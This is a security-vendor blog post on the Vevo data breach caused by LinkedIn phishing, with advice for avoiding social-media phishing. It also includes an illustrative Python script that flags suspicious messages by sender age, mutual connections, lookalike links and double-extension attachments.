Vevo Hacked Via LinkedIn Phishing Campaign, Over 3TB of Sensitive Data Exposed
On September 15th, streaming service Vevo disclosed a massive data breach, to the tune of 3.12TB of sensitive internal data. The breach occurred after one of its employees was compromised via a LinkedIn phishing campaign, demonstrating again that social media is an incredibly effective vector for launching targeted attacks. Already this summer, attackers have successfully used similarly fake social accounts to persuade employees at oil and gas companies, a cybersecurity firm, and a government department to open malicious attachments designed to take control of victims’ devices.
Why are phishing attacks so effective when waged over social media? Social media allows users to create believable online identities and interactions, which help users build credibility and trust with their real-world peers. For the most part, these profile fields are publicly facing, and they are among the first things a user checks when a friend request or incoming message arrives. Are they in the same profession? Do I share a common experience or connection? Attackers maximize opportunities for engagement by impersonating legitimate users or by fine-tuning profile fields and interactions to lure targets. Once a target has been socially engineered, their trust can be leveraged to extract personal information or deliver malicious payloads.
Many social networks further encourage users to disclose sensitive information about their job roles, responsibilities, family, hobbies and more, all in the spirit of engaging with friends, networking with colleagues and staying in touch with family. However, this information is dangerous in the wrong hands. An attacker may learn which employees have access to critical systems or who has financial signing authority based on role descriptions, enabling them to craft a more precise attack. Similarly, if a network engineer posts that they are certified for a certain type of firewall, that gives attackers what they need to conclude that the target organization very probably uses said product.
Personal information can also be readily weaponized by an attacker during a social engineering campaign. The more information an attacker can glean about the victim’s family, hobbies, home address and personal connections, the better they can craft a unique spearphishing message. To boot, once the attacker has lifted the relevant information from the target’s social media accounts during the reconnaissance phase, they can launch the attack from directly within the social network by posting the payload to the user’s profile or sending it via direct message. It’s likely the Vevo attackers followed this exact workflow when distributing their attacks.
To minimize exposure to LinkedIn phishing and other targeted social media attacks, ZeroFOX recommends that users:
- Limit interactions to users you’re sure you can trust. Make sure that you’ve either met them in person or that you have mutual connections and their profile seems credible. Don’t interact with profiles if they don’t know you or are contacting you for suspicious reasons.
- Avoid clicking on links or downloading file attachments sent to you through social media, especially if the links seem suspicious or if the users seem unfamiliar. On LinkedIn it’s common to share attachments like cover letters, resumes and letters of recommendation. When in doubt, pass the link or attachment in question to an open source malware detector.
- Ensure two-factor authentication is enabled on all of your social accounts. This provides another barrier of protection should an attacker ever steal your credentials. Many social networks can now require a code be sent to your phone or via email when they detect a new browser or device attempting to access your account, so be on the lookout for any sort of suspicious activity.
- Security professionals should train employees, especially those with high-access privileges or important organizational roles, on what information should or should not be posted or be visible to the public. Security teams can distribute guidance on how to make elements of an employee’s social accounts private, meaning only followers or friends can see certain data fields like date of birth, connections or home address.
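The checklist above can be turned into a simple triage script for an inbound connection request or direct message: does the sender share any mutual connections, is the account brand new, do any links point somewhere other than the real network, and do attachments carry an executable or double extension. The example below is added here for illustration and is not ZeroFOX code; the sample message, the trusted-domain allowlist, the 30-day account-age threshold and the extension lists are all assumptions chosen for the example. The SHA-256 it computes for a flagged attachment is what you would submit to a malware detector by hash lookup, so the file itself never needs to be opened.

```python
import hashlib
import re
from urllib.parse import urlparse

# Constructed sample of an inbound LinkedIn-style direct message (not a real capture).
SAMPLE_MESSAGE = {
    "sender": "Recruiter Jane",
    "mutual_connections": 0,
    "account_age_days": 12,
    "text": "Hi! Saw your profile, please review the role here: "
            "http://linkedin-careers.example.net/job and my attached brief.",
    "attachments": [
        {"name": "Job_Brief.pdf.exe", "bytes": b"MZ\x90\x00constructed-sample-bytes"},
    ],
}

# Assumed allowlist: only exact hosts of the real network are trusted, so lookalike
# domains such as linkedin-careers.example.net are flagged.
TRUSTED_DOMAINS = {"linkedin.com", "www.linkedin.com"}
# Assumed lists of extensions that should never arrive as a "resume" or "cover letter".
RISKY_EXTENSIONS = {".exe", ".scr", ".js", ".vbs", ".hta", ".lnk", ".docm", ".xlsm", ".iso"}
DOCUMENT_EXTENSIONS = {".pdf", ".doc", ".docx", ".txt", ".jpg", ".png"}
NEW_ACCOUNT_DAYS = 30  # assumed threshold for "brand new" sender accounts

URL_RE = re.compile(r"https?://[^\s<>\"']+")


def risky_links(text):
    """Return (url, host) pairs for every link whose host is not on the allowlist."""
    findings = []
    for url in URL_RE.findall(text):
        url = url.rstrip(".,;)")  # drop trailing sentence punctuation
        host = (urlparse(url).hostname or "").lower()
        if host not in TRUSTED_DOMAINS:
            findings.append((url, host))
    return findings


def risky_attachments(attachments):
    """Flag executable or double-extension filenames (e.g. brief.pdf.exe) and hash them
    so the hash can be looked up in a malware detector without opening the file."""
    findings = []
    for att in attachments:
        parts = att["name"].lower().split(".")
        ext = "." + parts[-1] if len(parts) > 1 else ""
        # A document extension immediately before the real extension is the classic
        # double-extension trick; a dotted name like john.doe.pdf is not flagged.
        double_ext = len(parts) > 2 and "." + parts[-2] in DOCUMENT_EXTENSIONS
        if ext in RISKY_EXTENSIONS or double_ext:
            findings.append({
                "name": att["name"],
                "sha256": hashlib.sha256(att["bytes"]).hexdigest(),
            })
    return findings


def triage(message):
    """Apply the checklist and return the reasons the message deserves scrutiny
    (an empty list means nothing was flagged)."""
    reasons = []
    if message["mutual_connections"] == 0:
        reasons.append("no mutual connections with sender")
    if message["account_age_days"] < NEW_ACCOUNT_DAYS:
        reasons.append(f"sender account is under {NEW_ACCOUNT_DAYS} days old")
    for url, host in risky_links(message["text"]):
        reasons.append(f"link to untrusted host {host}: {url}")
    for att in risky_attachments(message["attachments"]):
        reasons.append(f"risky attachment {att['name']} (sha256 {att['sha256']})")
    return reasons


if __name__ == "__main__":
    for reason in triage(SAMPLE_MESSAGE):
        print("FLAG:", reason)
```

Running it against the constructed message prints four flags: no mutual connections, a 12-day-old account, a link to a lookalike host, and a `.pdf.exe` attachment with its hash. A message from an established connection that links only to linkedin.com and attaches a plain `.pdf` produces no flags; that is the case the heuristics are tuned to leave alone, since cover letters and resumes are routine on LinkedIn.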
www.zerofox.com/blog